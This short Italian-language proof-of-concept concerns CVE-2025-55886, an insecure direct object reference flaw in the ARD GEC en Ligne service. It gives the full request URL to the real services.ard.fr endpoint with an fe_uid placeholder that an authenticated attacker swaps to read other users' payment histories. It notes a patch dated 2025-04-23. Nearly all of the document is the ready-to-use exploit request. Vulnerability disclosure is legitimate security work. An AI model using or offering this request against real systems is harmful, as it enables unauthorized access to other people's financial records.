
Proof-of-concept per CVE-2025-55886, una vulnerabilità IDOR in ARD GEC en Ligne che consente ad attaccanti autenticati di accedere alla cronologia dei pagamenti di altri utenti tramite il parametro fe_uid.
Una vulnerabilità di Insecure Direct Object Reference (IDOR) è stata scoperta in ARD. Il difetto risiede nel parametro fe_uid dell'endpoint API della cronologia dei pagamenti. Un utente malintenzionato autenticato può manipolare questo parametro per accedere senza autorizzazione alla cronologia dei pagamenti di altri utenti.
https://services.ard.fr/?eID=tx_afereload_records&_dc=1743696277812&fe_uid={USERID]&startTimestamp=1741017877&endTimestamp=1743782677&mobile=1&page=1&start=0&limit=100
ARD GEC en Ligne - Non versionato - Patchato il 2025-04-23